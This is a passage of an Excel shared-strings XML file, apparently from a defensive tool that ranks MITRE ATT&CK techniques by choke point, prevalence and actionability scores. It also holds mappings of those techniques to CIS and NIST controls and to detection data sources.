    <t>TOP 10 TECHNIQUES</t>
  </si>
  <si>
    <t>B15:19</t>
  </si>
  <si>
    <t xml:space="preserve">You can change your monitoring coverage, which will update the Top Technique score and the Ransomware Top Technique score. </t>
  </si>
  <si>
    <t>Methodology</t>
  </si>
  <si>
    <t>F:G</t>
  </si>
  <si>
    <t xml:space="preserve">These columns are to adjust the Choke Point score for each technique. Column F is how many techniques happen immediately before that row's technique and column G is how many techniques happen immediately after that row's technique. </t>
  </si>
  <si>
    <t>M:M</t>
  </si>
  <si>
    <t xml:space="preserve">This is our Sightings data and is hardcoded. </t>
  </si>
  <si>
    <t>N:U</t>
  </si>
  <si>
    <t xml:space="preserve">These columns are to adjust the Actionability score. Each column represents the number of analytics or controls for each technique. </t>
  </si>
  <si>
    <t>AN:AO</t>
  </si>
  <si>
    <t xml:space="preserve">These columns allow you to update the Ransomware Top Technique score. AN is to mark how many ransomware groups have been seen using that row's technique. </t>
  </si>
  <si>
    <t>Coverage Definitions</t>
  </si>
  <si>
    <t>This sheet describes our definitions for the different levels of network, process, file, hardware, and cloud coverage. This was borrowed from Cyb3rWard0g's work on "How Hot is your Hunt Team"</t>
  </si>
  <si>
    <t>Techniques</t>
  </si>
  <si>
    <t>This sheet is from the ATT&amp;CK page and includes all relavent data for each technique</t>
  </si>
  <si>
    <t>Parameters</t>
  </si>
  <si>
    <t>This sheet has values that feed our components in the Methodology sheet. 
D2:D5 changes the upper and lower bounds for Actionability. D6 changes the weighted ratio of detections to mitigations. 
D8:D11 changes the upper and lower bounds for Choke Point. D12 changes the weighted ratio of before to after techniques. 
D14 sets the date for which the prevalence methodology should use as "today's date." This should reflect the latest date that you have data for prevalence. 
D21:22 sets the upper and lower bounds for the ranswomare list. The upper bound is how many different groups are in the ransomware data set</t>
  </si>
  <si>
    <t>BELOW IS THE CALCULATED TOP TECHNIQUE SCORE</t>
  </si>
  <si>
    <t>Top Technique Score</t>
  </si>
  <si>
    <t>TID</t>
  </si>
  <si>
    <t>Name</t>
  </si>
  <si>
    <t>Ransomware Top Technique Score</t>
  </si>
  <si>
    <t>Additional Score Added (BY USER INPUT)</t>
  </si>
  <si>
    <t>What level is your PROCESS Coverage? (N/L/M/H)</t>
  </si>
  <si>
    <t>n</t>
  </si>
  <si>
    <t>What level is your NETWORK Coverage? (N/L/M/H)</t>
  </si>
  <si>
    <t>h</t>
  </si>
  <si>
    <t>What level is your FILE Coverage? (N/L/M/H)</t>
  </si>
  <si>
    <t>l</t>
  </si>
  <si>
    <t>What level is your CLOUD Coverage? (N/L/M/H)</t>
  </si>
  <si>
    <t>What level is your HARDWARE Coverage? (N/L/M/H)</t>
  </si>
  <si>
    <t>Choke Point</t>
  </si>
  <si>
    <t>Prevalence</t>
  </si>
  <si>
    <t xml:space="preserve">Actionability </t>
  </si>
  <si>
    <t>User Input Section</t>
  </si>
  <si>
    <t>Ransomware List</t>
  </si>
  <si>
    <t>Detections</t>
  </si>
  <si>
    <t>Mitigations</t>
  </si>
  <si>
    <t>Total Ransomware Top Score (Utility)</t>
  </si>
  <si>
    <t xml:space="preserve">Total Top Att&amp;ck Score </t>
  </si>
  <si>
    <t>Technique (ID)</t>
  </si>
  <si>
    <t>Technique (Name)</t>
  </si>
  <si>
    <t>Sub-technique (Name)</t>
  </si>
  <si>
    <t>Num. TID Before</t>
  </si>
  <si>
    <t>Num. TID After</t>
  </si>
  <si>
    <t>Choke Point Score</t>
  </si>
  <si>
    <t>Before Utility (unclipped)</t>
  </si>
  <si>
    <t>Before Utility</t>
  </si>
  <si>
    <t>After Utility (unclipped)</t>
  </si>
  <si>
    <t>After Utility</t>
  </si>
  <si>
    <t>Prevalence Scores</t>
  </si>
  <si>
    <t>Num. CAR</t>
  </si>
  <si>
    <t>Num. Sigma</t>
  </si>
  <si>
    <t>Num. ES SIEM</t>
  </si>
  <si>
    <t>Num. Splunk</t>
  </si>
  <si>
    <t>CIS Controls</t>
  </si>
  <si>
    <t>Num. CIS Controls</t>
  </si>
  <si>
    <t>NIST Controls</t>
  </si>
  <si>
    <t>Num. 800-53 (r5)</t>
  </si>
  <si>
    <t>Actionability Score</t>
  </si>
  <si>
    <t>Total Mitigations</t>
  </si>
  <si>
    <t>Mitigations Utility (unclipped)</t>
  </si>
  <si>
    <t>Mitigations Utility</t>
  </si>
  <si>
    <t>Total Detections</t>
  </si>
  <si>
    <t>Detections Utility (unclipped)</t>
  </si>
  <si>
    <t>Detections Utility</t>
  </si>
  <si>
    <t>data sources</t>
  </si>
  <si>
    <t>Process Coverage</t>
  </si>
  <si>
    <t>Process Modifier</t>
  </si>
  <si>
    <t>Network Coverage</t>
  </si>
  <si>
    <t>Network Modifier</t>
  </si>
  <si>
    <t>File Coverage</t>
  </si>
  <si>
    <t>File Modifier</t>
  </si>
  <si>
    <t>Cloud Coverage</t>
  </si>
  <si>
    <t>Cloud Modifier</t>
  </si>
  <si>
    <t>Hardware Coverage</t>
  </si>
  <si>
    <t>Hardware Modifier</t>
  </si>
  <si>
    <t>Ransomware (Total # of ATT&amp;CK Observations)</t>
  </si>
  <si>
    <t>Ransomware</t>
  </si>
  <si>
    <t>Total Ransomware Top Score (Utility)2</t>
  </si>
  <si>
    <t>TAT Utility (unclipped)</t>
  </si>
  <si>
    <t>TAT Utility</t>
  </si>
  <si>
    <t>Count Utility (unclipped)</t>
  </si>
  <si>
    <t>Count Utility</t>
  </si>
  <si>
    <t>Total Ransomware Top Score (Polynomial)2</t>
  </si>
  <si>
    <t>T1059</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter</t>
  </si>
  <si>
    <t>n/a</t>
  </si>
  <si>
    <t>2.3,2.5,2.7,4.1,4.7,4.8,5.3,5.4,6.1,6.2,6.8,9.3,9.6,9.7,10.1,10.2,10.7,13.2,13.7,18.3,18.5,16.10</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-3,AC-5,AC-6,CA-7,CA-8,CM-11,CM-2,CM-5,CM-6,CM-7,CM-8,IA-2,IA-8,IA-9,RA-5,SC-18,SI-10,SI-16,SI-2,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, Module: Module Load, Process: Process Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>T1218</t>
  </si>
  <si>
    <t>Signed Binary Proxy Execution</t>
  </si>
  <si>
    <t>2.3,2.5,2.7,4.1,4.7,4.8,5.3,5.4,6.1,6.2,6.8,10.5,18.3,18.5</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CA-7,CM-11,CM-2,CM-5,CM-6,CM-7,CM-8,IA-2,RA-5,SI-10,SI-16,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>T1562</t>
  </si>
  <si>
    <t>Impair Defenses</t>
  </si>
  <si>
    <t>3.3,4.1,4.7,5.3,5.4,6.1,6.2,6.8</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CA-7,CA-8,CM-2,CM-5,CM-6,CM-7,IA-2,IA-4,RA-5,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, Logon Session: Logon Session Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation</t>
  </si>
  <si>
    <t>T1047</t>
  </si>
  <si>
    <t>Windows Management Instrumentation</t>
  </si>
  <si>
    <t>4.7,5.2,5.3,5.4,6.1,6.2,6.8</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-3,AC-5,AC-6,CM-2,CM-5,CM-6,CM-7,IA-2,RA-5,SC-3,SC-34,SI-16,SI-2,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>T1053</t>
  </si>
  <si>
    <t>Scheduled Task/Job</t>
  </si>
  <si>
    <t>4.1,4.7,4.8,5.3,5.4,6.1,6.2,6.8,18.3,18.5</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CA-8,CM-2,CM-5,CM-6,CM-7,CM-8,IA-2,IA-4,IA-8,RA-5,SI-4</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation</t>
  </si>
  <si>
    <t>T1055</t>
  </si>
  <si>
    <t>Process Injection</t>
  </si>
  <si>
    <t>4.1,4.7,5.3,5.4,6.1,6.2,6.8,13.2,13.7</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CM-5,CM-6,IA-2,SC-18,SC-7,SI-2,SI-3,SI-4</t>
  </si>
  <si>
    <t>Process: OS API Execution, Process: Process Access, Process: Process Modification</t>
  </si>
  <si>
    <t>T1036</t>
  </si>
  <si>
    <t>Masquerading</t>
  </si>
  <si>
    <t>2.5,2.7,3.3,4.1,6.1,6.2,6.8</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-6,CA-7,CM-2,CM-6,CM-7,IA-9,SI-10,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>File: File Metadata</t>
  </si>
  <si>
    <t>T1543</t>
  </si>
  <si>
    <t>Create or Modify System Process</t>
  </si>
  <si>
    <t>2.3,2.5,3.3,4.1,4.7,5.3,5.4,6.1,6.2,6.8,18.3,18.5</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-3,AC-5,AC-6,CA-7,CA-8,CM-11,CM-2,CM-3,CM-5,CM-6,CM-7,IA-2,IA-4,RA-5,SA-22,SI-16,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, Module: Module Load, Process: Process Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1574</t>
  </si>
  <si>
    <t>Hijack Execution Flow</t>
  </si>
  <si>
    <t>2.5,2.6,4.1,4.7,5.3,5.4,6.1,6.2,6.8,7.1,7.2,7.3,7.4,7.5,16.13,18.3,18.5</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-4,AC-5,AC-6,CA-7,CA-8,CM-2,CM-5,CM-6,CM-7,CM-8,IA-2,RA-5,SI-10,SI-2,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Instance: Instance Creation, Instance: Instance Deletion, Instance: Instance Modification, Instance: Instance Start, Instance: Instance Stop, Snapshot: Snapshot Creation, Snapshot: Snapshot Deletion, Snapshot: Snapshot Modification, Volume: Volume Creation, Volume: Volume Deletion, Volume: Volume Modification</t>
  </si>
  <si>
    <t>T1112</t>
  </si>
  <si>
    <t>Modify Registry</t>
  </si>
  <si>
    <t>AC-6,CM-7</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: OS API Execution</t>
  </si>
  <si>
    <t>T1095</t>
  </si>
  <si>
    <t>Non-Application Layer Protocol</t>
  </si>
  <si>
    <t>4.2,4.4,4.5,7.6,7.7,12.2,12.8,13.3,13.4,13.8,18.2,18.3,13.10</t>
  </si>
  <si>
    <t>AC-3,AC-4,CA-7,CM-2,CM-6,CM-7,SC-7,SI-10,SI-15,SI-3,SI-4</t>
  </si>
  <si>
    <t>Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>T1090</t>
  </si>
  <si>
    <t>Proxy</t>
  </si>
  <si>
    <t>4.2,4.4,9.3,13.3,13.4,13.8</t>
  </si>
  <si>
    <t>AC-3,AC-4,CA-7,CM-2,CM-6,CM-7,SC-7,SC-8,SI-10,SI-15,SI-3,SI-4</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Modification, Group: Group Modification, Process: Process Creation, User Account: User Account Modification</t>
  </si>
  <si>
    <t>T1027</t>
  </si>
  <si>
    <t>Obfuscated Files or Information</t>
  </si>
  <si>
    <t>10.1,10.2,10.7,13.2,13.7</t>
  </si>
  <si>
    <t>CM-2,CM-6,SI-2,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1564</t>
  </si>
  <si>
    <t>Hide Artifacts</t>
  </si>
  <si>
    <t>Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution</t>
  </si>
  <si>
    <t>T1105</t>
  </si>
  <si>
    <t>Ingress Tool Transfer</t>
  </si>
  <si>
    <t>13.3,13.8</t>
  </si>
  <si>
    <t>AC-4,CA-7,CM-2,CM-6,CM-7,SC-7,SI-3,SI-4</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1569</t>
  </si>
  <si>
    <t>System Services</t>
  </si>
  <si>
    <t>4.1,4.7,5.3,5.4,6.1,6.2,6.8</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CA-7,CM-11,CM-2,CM-5,CM-6,CM-7,IA-2,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>File: File Creation, File: File Modification, Module: Module Load</t>
  </si>
  <si>
    <t>T1021</t>
  </si>
  <si>
    <t>Remote Services</t>
  </si>
  <si>
    <t>4.7,5.3,6.1,6.2,6.4,6.5,6.8</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-20,AC-3,AC-5,AC-6,AC-7,CM-5,CM-6,IA-2,IA-5,SI-4</t>
  </si>
  <si>
    <t>Command: Command Execution, Logon Session: Logon Session Creation, Module: Module Load, Network Share: Network Share Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow, Process: Process Creation</t>
  </si>
  <si>
    <t>T1548</t>
  </si>
  <si>
    <t>Abuse Elevation Control Mechanism</t>
  </si>
  <si>
    <t>2.5,3.3,4.1,4.7,5.3,5.4,6.1,6.2,6.8,18.3,18.5</t>
  </si>
  <si>
    <t>AC-16,AC-2,AC-3,AC-5,AC-6,CA-7,CA-8,CM-2,CM-5,CM-6,CM-7,CM-8,IA-2,RA-5,SC-18,SC-34,SI-12,SI-16,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access</t>
  </si>
  <si>
    <t>T1070</t>
  </si>
  <si>
    <t>Indicator Removal on Host</t>
  </si>
  <si>
    <t>3.1,3.11,3.12,3.3,3.4,4.1,5.4,6.1,6.2,6.8,8.1,8.2,8.3,8.9,12.8,3.10,8.10</t>
  </si>
  <si>
    <t>AC-16,AC-17,AC-18,AC-19,AC-2,AC-3,AC-5,AC-6,CA-7,CM-2,CM-6,CP-6,CP-7,CP-9,SC-36,SC-4,SI-12,SI-23,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>T1204</t>
  </si>
  <si>
    <t>User Execution</t>
  </si>
  <si>
    <t>2.3,2.5,2.7,9.3,9.6,13.3,13.8,14.1,14.2,14.6</t>
  </si>
  <si>
    <t>AC-4,CA-7,CM-2,CM-6,CM-7,SC-44,SC-7,SI-10,SI-2,SI-3,SI-4,SI-7,SI-8</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Logon Session: Logon Session Creation</t>
  </si>
  <si>
    <t>T1082</t>
  </si>
  <si>
    <t>System Information Discovery</t>
  </si>
  <si>
    <t>T1560</t>
  </si>
  <si>
    <t>Archive Collected Data</t>
  </si>
  <si>
    <t>2.1,2.2,2.3,2.4,18.3,18.5</t>
  </si>
  <si>
    <t>CA-8,RA-5,SC-7,SI-3,SI-4</t>
  </si>
  <si>
    <t>Command: Command Execution, Sensor Health: Host Status, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1140</t>
  </si>
  <si>
    <t>Deobfuscate/Decode Files or Information</t>
  </si>
  <si>
    <t>T1497</t>
  </si>
  <si>
    <t>Virtualization/Sandbox Evasion</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, File: File Creation, File: File Modification, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation</t>
  </si>
  <si>
    <t>T1003</t>
  </si>
  <si>
    <t>OS Credential Dumping</t>
  </si>
  <si>
    <t>2.6, 3.11, 3.12, 4.1, 4.7, 4.8, 5.2, 5.3, 5.4, 6.1, 6.2, 6.8, 11.3, 14.1, 14.3,16.1, 16.9, 18.3, 18.5</t>
  </si>
  <si>
    <t>AC-16,AC-2,AC-3,AC-4,AC-5,AC-6,CA-7,CM-2,CM-5,CM-6,CM-7,CP-9,IA-2,IA-4,IA-5,SC-28,SC-39,SI-12,SI-2,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access</t>
  </si>
  <si>
    <t>T1547</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution</t>
  </si>
  <si>
    <t>Driver: Driver Load, File: File Creation, Module: Module Load, Process: OS API Execution, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1056</t>
  </si>
  <si>
    <t>Input Capture</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: OS API Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>T1546</t>
  </si>
  <si>
    <t>Event Triggered Execution</t>
  </si>
  <si>
    <t>CM-2,CM-6,IA-9,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1106</t>
  </si>
  <si>
    <t>Native API</t>
  </si>
  <si>
    <t>AC-6,CM-2,CM-6,CM-7,SI-2,SI-3,SI-4</t>
  </si>
  <si>
    <t>T1555</t>
  </si>
  <si>
    <t>Credentials from Password Stores</t>
  </si>
  <si>
    <t>CA-7,IA-5,SI-4</t>
  </si>
  <si>
    <t>Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Service: Service Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1489</t>
  </si>
  <si>
    <t>Service Stop</t>
  </si>
  <si>
    <t>3.12,4.1,4.7,5.3,5.4,6.1,6.2,6.8,12.2,12.8</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-4,AC-5,AC-6,CA-7,CM-5,CM-6,CM-7,IA-2,SC-46,SC-7,SI-4</t>
  </si>
  <si>
    <t>Network Traffic: Network Traffic Flow, Sensor Health: Host Status</t>
  </si>
  <si>
    <t>T1091</t>
  </si>
  <si>
    <t>Replication Through Removable Media</t>
  </si>
  <si>
    <t>2.3,2.5,4.1,7.7,10.3,18.3,18.5</t>
  </si>
  <si>
    <t>AC-3,AC-6,CM-2,CM-6,CM-8,MP-7,RA-5,SC-41,SI-3,SI-4</t>
  </si>
  <si>
    <t>T1012</t>
  </si>
  <si>
    <t>Query Registry</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access</t>
  </si>
  <si>
    <t>T1057</t>
  </si>
  <si>
    <t>Process Discovery</t>
  </si>
  <si>
    <t>T1552</t>
  </si>
  <si>
    <t>Unsecured Credentials</t>
  </si>
  <si>
    <t>3.1,3.11,3.12,3.2,3.3,4.1,4.2,4.5,4.7,5.2,5.3,5.4,6.1,6.2,6.8,7.1,7.2,7.3,7.5,11.3,14.3,14.4,14.9,16.1,16.9,18.3,18.5,13.10</t>
  </si>
  <si>
    <t>AC-16,AC-17,AC-18,AC-19,AC-2,AC-20,AC-3,AC-4,AC-5,AC-6,CA-7,CA-8,CM-2,CM-5,CM-6,CM-7,IA-2,IA-3,IA-4,IA-5,RA-5,SA-11,SA-15,SC-12,SC-28,SC-4,SC-7,SI-10,SI-12,SI-15,SI-2,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1074</t>
  </si>
  <si>
    <t>Data Staged</t>
  </si>
  <si>
    <t>File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation</t>
  </si>
  <si>
    <t>T1071</t>
  </si>
  <si>
    <t>Application Layer Protocol</t>
  </si>
  <si>
    <t>AC-4,CA-7,CM-2,CM-6,CM-7,SC-10,SC-20,SC-21,SC-22,SC-23,SC-31,SC-37,SC-7,SI-3,SI-4</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, File: File Creation</t>
  </si>
  <si>
    <t>T1087</t>
  </si>
  <si>
    <t>Account Discovery</t>
  </si>
  <si>
    <t>4.1,4.8,18.3,18.5</t>
  </si>
  <si>
    <t>CM-6,CM-7,SI-4</t>
  </si>
  <si>
    <t>T1482</t>
  </si>
  <si>
    <t>Domain Trust Discovery</t>
  </si>
  <si>
    <t>3.12,4.1,4.4,11.3,11.4,12.2,12.8,18.3,18.5</t>
  </si>
  <si>
    <t>AC-4,CA-8,CM-6,CM-7,RA-5,SA-17,SA-8,SC-46,SC-7</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow, Process: Process Creation, Sensor Health: Host Status</t>
  </si>
  <si>
    <t>T1571</t>
  </si>
  <si>
    <t>Non-Standard Port</t>
  </si>
  <si>
    <t>4.2,4.4,12.2,12.8,13.3,13.8</t>
  </si>
  <si>
    <t>File: File Creation, File: File Modification, Process: Process Creation</t>
  </si>
  <si>
    <t>T1113</t>
  </si>
  <si>
    <t>Screen Capture</t>
  </si>
  <si>
    <t>T1083</t>
  </si>
  <si>
    <t>File and Directory Discovery</t>
  </si>
  <si>
    <t>T1490</t>
  </si>
  <si>
    <t>Inhibit System Recovery</t>
  </si>
  <si>
    <t>4.1,11.1,11.2,11.3,11.4,11.5,18.3,18.5</t>
  </si>
  <si>
    <t>AC-3,AC-6,CM-2,CM-6,CM-7,CP-10,CP-2,CP-7,CP-9,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1197</t>
  </si>
  <si>
    <t>BITS Jobs</t>
  </si>
  <si>
    <t>4.1,4.2,4.4,4.5,4.7,5.3,5.4,6.1,6.2,6.8,13.4,18.2,18.3,18.5</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-4,AC-5,AC-6,CA-7,CM-5,CM-6,CM-7,IA-2,SC-7,SI-10,SI-15,SI-4</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Creation, Active Directory: Active Directory Object Modification, Network Traffic: Network Traffic Content, User Account: User Account Authentication</t>
  </si>
  <si>
    <t>T1553</t>
  </si>
  <si>
    <t>Subvert Trust Controls</t>
  </si>
  <si>
    <t>2.5,2.6,4.1,4.8,18.3,18.5</t>
  </si>
  <si>
    <t>AC-6,CA-8,CM-10,CM-2,CM-3,CM-5,CM-6,CM-7,CM-8,IA-7,IA-9,RA-9,SA-10,SA-11,SC-34,SI-10,SI-2,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>T1518</t>
  </si>
  <si>
    <t>Software Discovery</t>
  </si>
  <si>
    <t>File: File Access, Process: Process Access</t>
  </si>
  <si>
    <t>T1127</t>
  </si>
  <si>
    <t>Trusted Developer Utilities Proxy Execution</t>
  </si>
  <si>
    <t>2.3,2.5,2.7,4.1,4.8,18.3,18.5,16.10</t>
  </si>
  <si>
    <t>CM-2,CM-6,CM-7,CM-8,RA-5,SI-10,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1102</t>
  </si>
  <si>
    <t>Web Service</t>
  </si>
  <si>
    <t>2.3,2.5,9.3,13.3,13.8</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, User Account: User Account Authentication</t>
  </si>
  <si>
    <t>T1561</t>
  </si>
  <si>
    <t>Disk Wipe</t>
  </si>
  <si>
    <t>11.1,11.2,11.3,11.4,11.5</t>
  </si>
  <si>
    <t>AC-3,AC-6,CM-2,CP-10,CP-2,CP-7,CP-9,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Process: Process Metadata</t>
  </si>
  <si>
    <t>T1566</t>
  </si>
  <si>
    <t>Phishing</t>
  </si>
  <si>
    <t>2.3,2.7,9.3,9.6,13.3,13.8,14.1,14.2,14.6</t>
  </si>
  <si>
    <t>AC-4,CA-7,CM-2,CM-6,IA-9,SC-20,SC-44,SC-7,SI-2,SI-3,SI-4,SI-8</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification, Process: Process Creation, Service: Service Creation</t>
  </si>
  <si>
    <t>T1211</t>
  </si>
  <si>
    <t>Exploitation for Defense Evasion</t>
  </si>
  <si>
    <t>7.1,7.2,7.3,7.4,7.5,10.5,18.3,18.5</t>
  </si>
  <si>
    <t>AC-4,AC-6,CA-7,CA-8,CM-2,CM-6,CM-8,RA-10,RA-5,SC-18,SC-2,SC-26,SC-29,SC-3,SC-30,SC-35,SC-39,SC-7,SI-2,SI-3,SI-4,SI-5,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>T1132</t>
  </si>
  <si>
    <t>Data Encoding</t>
  </si>
  <si>
    <t>AC-4,CA-7,CM-2,CM-6,SC-7,SI-3,SI-4</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Modification, Process: OS API Execution, User Account: User Account Metadata</t>
  </si>
  <si>
    <t>T1016</t>
  </si>
  <si>
    <t>System Network Configuration Discovery</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>T1069</t>
  </si>
  <si>
    <t>Permission Groups Discovery</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Deletion</t>
  </si>
  <si>
    <t>T1040</t>
  </si>
  <si>
    <t>Network Sniffing</t>
  </si>
  <si>
    <t>4.2,4.6,6.4,6.5,3.10</t>
  </si>
  <si>
    <t>AC-16,AC-17,AC-18,AC-19,IA-2,IA-5,SC-4,SC-8,SI-12,SI-4,SI-7</t>
  </si>
  <si>
    <t>Cloud Service: Cloud Service Enumeration, Command: Command Execution, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>T1220</t>
  </si>
  <si>
    <t>XSL Script Processing</t>
  </si>
  <si>
    <t>2.5,2.7</t>
  </si>
  <si>
    <t>CM-2,CM-6,CM-7,SI-10,SI-4,SI-7</t>
  </si>
  <si>
    <t>Cloud Storage: Cloud Storage Metadata, Cloud Storage: Cloud Storage Modification, Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation</t>
  </si>
  <si>
    <t>T1018</t>
  </si>
  <si>
    <t>Remote System Discovery</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>T1202</t>
  </si>
  <si>
    <t>Indirect Command Execution</t>
  </si>
  <si>
    <t>T1046</t>
  </si>
  <si>
    <t>Network Service Scanning</t>
  </si>
  <si>
    <t>3.12,4.4,4.8,7.6,7.7,12.2,12.8,13.3,13.8,16.8,18.2,18.3,16.10</t>
  </si>
  <si>
    <t>AC-4,CA-7,CM-2,CM-6,CM-7,CM-8,RA-5,SC-46,SC-7,SI-3,SI-4</t>
  </si>
  <si>
    <t>T1559</t>
  </si>
  <si>
    <t>Inter-Process Communication</t>
  </si>
  <si>
    <t>2.5,2.6,4.1,4.8,13.7,18.3,18.5</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-4,AC-5,AC-6,CM-10,CM-2,CM-5,CM-6,CM-7,CM-8,IA-2,RA-5,SC-18,SC-3,SC-7,SI-2,SI-3,SI-4</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Command: Command Execution, Process: Process Creation, Script: Script Execution, Sensor Health: Host Status, Windows Registry: Windows Registry Key Creation</t>
  </si>
  <si>
    <t>T1486</t>
  </si>
  <si>
    <t>Data Encrypted for Impact</t>
  </si>
  <si>
    <t>AC-3,AC-6,CM-2,CP-10,CP-2,CP-6,CP-7,CP-9,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1001</t>
  </si>
  <si>
    <t>Data Obfuscation</t>
  </si>
  <si>
    <t>13.3, 13.8</t>
  </si>
  <si>
    <t>Network Traffic: Network Traffic Content</t>
  </si>
  <si>
    <t>T1557</t>
  </si>
  <si>
    <t>Adversary-in-the-Middle</t>
  </si>
  <si>
    <t>3.12,4.1,4.2,4.4,4.6,4.8,7.6,7.7,12.2,12.8,13.3,13.4,13.8,14.2,14.6,16.8,18.2,18.3,18.5,16.10,3.10</t>
  </si>
  <si>
    <t>AC-16,AC-17,AC-18,AC-19,AC-20,AC-3,AC-4,CA-7,CM-2,CM-6,CM-7,CM-8,RA-5,SC-23,SC-4,SC-46,SC-7,SC-8,SI-10,SI-12,SI-15,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>T1505</t>
  </si>
  <si>
    <t>Server Software Component</t>
  </si>
  <si>
    <t>2.7,4.1,4.7,5.3,5.4,6.1,6.2,18.3,18.5</t>
  </si>
  <si>
    <t>AC-16,AC-2,AC-3,AC-5,AC-6,CA-8,CM-11,CM-2,CM-5,CM-6,CM-8,IA-2,RA-5,SA-10,SA-11,SC-16,SI-14,SI-4,SI-7,SR-11,SR-4,SR-5,SR-6</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Modification, User Account: User Account Deletion, User Account: User Account Modification</t>
  </si>
